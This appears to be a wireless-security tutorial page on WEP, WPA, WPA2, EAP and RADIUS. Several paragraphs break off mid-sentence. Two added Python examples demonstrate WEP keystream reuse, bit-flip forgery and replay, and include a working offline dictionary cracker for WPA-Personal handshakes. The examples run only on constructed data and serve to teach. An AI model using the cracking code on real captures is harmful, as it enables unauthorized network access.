Wireless Security
Wireless is preferred for networks that are temporary, require flexibility, and in which high security is not needed. Because it is particularly vulnerable to attack, security is a primary concern when installing wireless. Hackers looking for a wireless network go "war-driving": cruising around looking for a wireless signal to exploit. Usually war drivers are just looking for free Internet access, but sometimes they're looking for confidential information such as credit card numbers. And many war drivers, when they locate a wireless network, will post its GPS coordinates on the Internet. Although a wireless network can never be totally secure, there are important steps you can take to minimize the risk:
Know where you're signaling.
When you install a wireless network near public areas, it's very important to know where your signal is going. If it's easily picked up on the sidewalk outside your business, perhaps from a parked car across the street or from the building next door, then you've got a security problem. If you send a strong wireless signal into the coffee house next door to your business, chances are someone is going

Separate wireless from wired to increase security.
Once you separate the wireless from the wired network, insist that anything that needs to be kept secure stay on the wired network. This includes confidential data such as credit card numbers, sensitive financial data, or corporate secrets of any kind. You can, however, freely use the wireless network for less-sensitive applications such as laptops for taking notes at meetings, PCs for temporary workers, computer hookups for trade show booths, and bar-code readers for inventory.

An important step in wireless security is to connect your wireless access points to switches rather than hubs. A hub repeats every frame it receives to every port, so an access point on a hub puts all of the wired segment's traffic on the air, where anyone in range can capture it. A switch forwards a unicast frame only to the port where its destination address was learned, so the access point, and therefore the air, sees only frames addressed to wireless nodes, plus broadcasts and frames to destinations the switch has not yet learned. Note that this limits what leaks over the air; it does nothing to protect the wireless traffic itself, which still needs encryption.

Another way to isolate your wireless network is to gather all access points into a separate LAN connected to the DMZ port of your firewall. This makes the wireless network accessible, yet keeps it outside of your main wired LAN, so a wireless client can reach internal hosts only through the rules the firewall enforces. Hardware and software firewall systems control the flow of data in both wired and wireless networks. Use a firewall to intercept, analyze, and stop a wide range of attacks.

Another security option is to use a Virtual Private Network (VPN), which works with both wired and wireless networks. A VPN protects remote access users by increasing the security of information transferred over the Internet.
A VPN works by creating a private, encrypted "tunnel" from the end user's computer through the access point, the Internet, and all the way to the corporate servers. Most IT

Lock it up.

WEP.
The IEEE 802.11 wireless LAN standards include a security protocol called Wired Equivalent Privacy (WEP). WEP encrypts each 802.11 packet separately with an RC4 keystream generated from a 64- or 128-bit key: a 40- or 104-bit secret shared by every station, prepended with a 24-bit initialization vector (IV) that is sent in the clear with each packet. Several cryptanalysts have identified weaknesses in RC4's key scheduling algorithm (the Fluhrer, Mantin and Shamir attack of 2001) that let an attacker who passively collects enough packets recover the shared secret key. Software tools such as AirSnort

WEP encryption can keep out casual hackers but is clearly not adequate where high security is required. Fortunately, WEP is not the only encryption method for your wireless network; other available security protocols operate at the higher Network and Transport layers. These protocols are more difficult to crack than WEP and usually rely on a

EAP-TLS.
Extensible Authentication Protocol-Transport Layer Security (EAP-TLS) carries a Transport Layer Security (TLS) handshake, the successor to the Secure Socket Layer (SSL) protocol, inside EAP. EAP-TLS uses X.509 certificates for both user and server authentication and for

EAP-TTLS.
Extensible Authentication Protocol-Tunneled Transport Layer Security (EAP-TTLS) authentication uses a two-stage authentication process, which eliminates the

WPA.
Wi-Fi Protected Access (WPA) was introduced in 2003 to enhance wireless security and to address WEP's vulnerabilities. WPA improves data encryption and user authentication, and is software upgradable for existing WEP certified products. Although no security solution is absolute, WPA is a vast improvement over WEP. It was also designed to run on existing WEP hardware and to be forward compatible with 802.11i.

Improved data encryption through Temporal Key Integrity Protocol (TKIP).
This WPA enhancement improves on WEP's data encryption.
It adds four algorithms to WEP: a per-packet key mixing function, so the RC4 key for a packet is no longer simply the IV prepended to the shared key; a message integrity code (MIC, named Michael) that replaces WEP's linear CRC-32 integrity check, so a packet altered in transit is detected; a rekeying mechanism; and an IV sequencing discipline (a 48-bit sequence counter, with out-of-order packets dropped) to remove replay attacks.

Enterprise-level user authentication.
To strengthen user authentication beyond WEP, WPA uses 802.1X and EAP. This framework uses a central authentication server, such as RADIUS, to authenticate each user on the network. WPA is available for home and enterprise networks. WPA-Personal guards against unauthorized network access with a pre-shared key: every station derives the same key from a passphrase and the network name, so anyone who learns the passphrase is in, and a weak passphrase can be guessed offline by someone who has captured a station joining the network.
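The WEP and TKIP paragraphs above describe three of the weaknesses in WEP's per-packet RC4 scheme and the fixes TKIP bolted on. The following is an added example, not code from the original page: a toy model of WEP framing (3-byte clear IV, RC4 keyed with IV plus shared secret, CRC-32 integrity value) that demonstrates keystream reuse under a repeated IV, a bit-flipping forgery that survives the CRC check, and a replay, together with the sequence-counter check that TKIP uses to stop the replay. The 40-bit key, IVs and packet contents are constructed sample values.

```python
"""Toy model of WEP's per-packet RC4 encryption, showing three defects that
TKIP's per-packet key mixing, Michael MIC and IV sequencing address.
Keys, IVs and packet contents below are constructed sample values."""
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4: key scheduling (KSA), then keystream generation (PRGA) XORed in."""
    S = list(range(256))
    j = 0
    for i in range(256):                            # KSA; with a known IV at the
        j = (j + S[i] + key[i % len(key)]) & 0xFF   # front of the key this is what
        S[i], S[j] = S[j], S[i]                     # the FMS attack exploits
    out = bytearray()
    i = j = 0
    for byte in data:                               # PRGA
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def crc(data: bytes) -> bytes:
    """WEP's ICV: plain CRC-32, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = 3-byte IV in the clear || RC4(IV || secret, data || ICV)."""
    return iv + rc4(iv + secret, plaintext + crc(plaintext))


def wep_decrypt(secret: bytes, frame: bytes):
    """Plain WEP receiver: returns the data, or None if the ICV fails."""
    iv, body = frame[:3], frame[3:]
    clear = rc4(iv + secret, body)
    data, icv = clear[:-4], clear[-4:]
    return data if crc(data) == icv else None


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def keystream_reuse(secret, iv, known_pt, other_pt):
    """Defect 1: the same IV means the same RC4 key and keystream, so
    frame1 XOR frame2 == pt1 XOR pt2; one known plaintext reveals the other."""
    f1 = wep_encrypt(secret, iv, known_pt)
    f2 = wep_encrypt(secret, iv, other_pt)
    n = min(len(known_pt), len(other_pt))
    return xor(xor(f1[3:3 + n], f2[3:3 + n]), known_pt[:n])


def bit_flip(frame, delta):
    """Defect 2: without the key, XOR chosen bits into the ciphertext and patch
    the encrypted ICV, because CRC-32 is affine: crc(a ^ d) == crc(a) ^ crc(d)
    ^ crc(zeros of the same length).  A keyed MIC is what stops this."""
    iv, body = frame[:3], frame[3:]
    data_ct, icv_ct = body[:-4], body[-4:]
    delta = delta.ljust(len(data_ct), b"\x00")
    icv_delta = xor(crc(delta), crc(bytes(len(delta))))
    return iv + xor(data_ct, delta) + xor(icv_ct, icv_delta)


class SequencedReceiver:
    """Defect 3 and its fix: plain WEP accepts a replayed frame forever.
    Treating the IV as a monotonically increasing sequence counter (what
    TKIP does with its 48-bit counter) makes the replay fail."""

    def __init__(self, secret: bytes):
        self.secret, self.last_seq = secret, -1

    def accept(self, frame: bytes):
        seq = int.from_bytes(frame[:3], "big")
        if seq <= self.last_seq:
            return None                             # replay or reordering: drop
        data = wep_decrypt(self.secret, frame)
        if data is not None:
            self.last_seq = seq
        return data


if __name__ == "__main__":
    secret = bytes.fromhex("0102030405")            # constructed 40-bit WEP key
    f = wep_encrypt(secret, b"\x00\x00\x01", b"hello world")
    print(wep_decrypt(secret, f))                   # b'hello world'
    print(keystream_reuse(secret, b"\x00\x00\x01",
                          b"known plaintext!", b"secret message!!"))  # b'secret message!!'
    print(wep_decrypt(secret, bit_flip(f, bytes(6) + b"\x20" * 5)))  # b'hello WORLD'
    r = SequencedReceiver(secret)
    print(r.accept(f), r.accept(f))                 # b'hello world' None
```

The forged frame in the third step flips the case of "world" and is accepted by the plain WEP receiver because the patched ICV still matches; TKIP's Michael MIC is keyed, so the same trick produces a MIC failure instead. The key-recovery attack on the key schedule is not modelled here; the point of the example is why the MIC and the sequence counter were necessary even before the key itself was recoverable.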
WPA-Enterprise provides stronger network security. It verifies users through a server. It also employs 128-bit encryption keys and dynamic session keys to enhance security.

WPA2.
Wi-Fi Protected Access 2 (WPA2) is the next generation of security. Introduced in September 2004, it builds on WPA and implements the full IEEE 802.11i standard. It enhances security through stronger data protection (the AES-based CCMP cipher replaces TKIP's RC4) and network access control. It's designed to provide a higher level of security so that only authorized

WPA2 is backward compatible with WPA, so if you are already using WPA, you can move to WPA2 at your own pace. WPA2 comes in two versions: WPA2-Personal and WPA2-Enterprise. WPA2-Personal is designed for the home or SOHO wireless network. It builds on WPA-Personal, provides stronger data protection, and prevents unauthorized access through a pass phrase. WPA2-Enterprise also provides stronger data protection than WPA, and prevents unauthorized network access by verifying network users through a server.

Wi-Fi Multimedia (WMM) is another Wi-Fi Alliance certification introduced in September 2004. It is a quality-of-service feature rather than a security system: it's designed to bring wireless into the mainstream of consumer electronics, phones, etc. WMM enhances and improves the use of audio, video, and voice applications over a wireless network. It's based on a subset of the IEEE 802.11e WLAN QoS draft standard. WMM prioritizes streams of content and optimizes how the network allocates bandwidth among competing applications.

Another standard element of many wireless security systems is Remote Authentication Dial-In User Service (RADIUS) authentication and authorization. With RADIUS, the access point holds no user credentials itself; it passes each login (a user name and password, or a certificate exchange carried in EAP) to the RADIUS server, which verifies the user before access is given. Different levels of access can be set up as well. The access points and the server share a secret that protects the exchange between them, so that secret needs the same care as any other password.

Pay attention and weigh the risks.
With a wireless network, as in any other network, it's important to have a security plan and then implement it. The biggest problem with wireless security is that network administrators often fail to take even the simplest of steps to ensure security: they do not deploy WPA or WPA2, fail to change the default passwords and network name, and don't place access

Weigh risks against benefits when you decide whether wireless is worth implementing. Depending on your situation, the convenience of wireless might outweigh the risk; you may decide that your wireless network is secure enough to take a chance with sensitive information. An
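The WPA-Personal and WPA2-Personal sections above say that the pass phrase is what keeps unauthorized users out, and the closing advice warns against leaving default passwords in place. The following added example (not code from the original page) shows concretely why the pass phrase is the whole of the secret in Personal mode. It derives the pre-shared key the way IEEE 802.11i specifies (PBKDF2-HMAC-SHA1 of the pass phrase, salted with the SSID, 4096 iterations, 256 bits), expands it to the key-confirmation key used in the 4-way handshake, and then runs an offline dictionary attack against a handshake MIC. The MAC addresses, nonces, EAPOL-Key frame and word list are constructed sample data built from the true pass phrase, standing in for a capture; nothing here talks to a network.

```python
"""WPA/WPA2-Personal key derivation and an offline pass-phrase guess against
a (constructed) 4-way handshake.  Added example; all inputs are sample data."""
import hashlib
import hmac


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, dklen=32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """The 802.11i PRF: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def kck_from_handshake(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces)).
    Its first 16 bytes are the KCK, which keys the handshake MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 64)[:16]


MIC_OFFSET = 81  # byte offset of the 16-byte Key MIC field in an EAPOL-Key frame


def eapol_mic(kck, eapol_frame):
    """Key descriptor version 2 (used with CCMP): HMAC-SHA1 over the frame with
    the MIC field zeroed, truncated to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, wordlist):
    """Offline dictionary attack: the SSID, MACs, nonces and MIC are all in the
    capture, so each guess costs one PBKDF2 run plus a PRF and an HMAC."""
    captured_mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        try:
            pmk = wpa_psk(word, ssid)
        except ValueError:          # too short or too long to be a valid passphrase
            continue
        kck = kck_from_handshake(pmk, ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return word
    return None


def make_sample_handshake(passphrase, ssid):
    """Constructed sample: fixed MACs and nonces, and a minimal 99-byte
    EAPOL-Key message 2 whose MIC is computed from the true pass phrase,
    standing in for a frame captured off the air."""
    ap_mac = bytes.fromhex("00115a000001")
    sta_mac = bytes.fromhex("00115a000002")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    frame = bytearray(99)
    frame[0:4] = b"\x01\x03\x00\x5f"   # 802.1X header: version 1, EAPOL-Key, length 95
    frame[4] = 2                       # key descriptor type: RSN
    frame[5:7] = b"\x01\x0a"           # key info: version 2, pairwise, MIC present
    frame[17:49] = snonce              # SNonce carried in message 2
    kck = kck_from_handshake(wpa_psk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    frame[MIC_OFFSET:MIC_OFFSET + 16] = eapol_mic(kck, bytes(frame))
    return ap_mac, sta_mac, anonce, snonce, bytes(frame)


if __name__ == "__main__":
    print(wpa_psk("password", "IEEE").hex())      # 802.11i Annex test vector
    sample = make_sample_handshake("correcthorse", "HomeNet")
    print(crack("HomeNet", *sample, ["letmein1", "password", "correcthorse"]))  # correcthorse
```

The derivation is deliberately slow (4096 PBKDF2 rounds), but that only multiplies the attacker's per-guess cost by a constant; a pass phrase that is in a word list or is the router's printed default falls anyway, and nothing in WPA-Personal stops the attacker from trying as many guesses as they like against a recorded handshake. Enterprise mode avoids this by giving each user separate credentials checked by the RADIUS server instead of one shared secret.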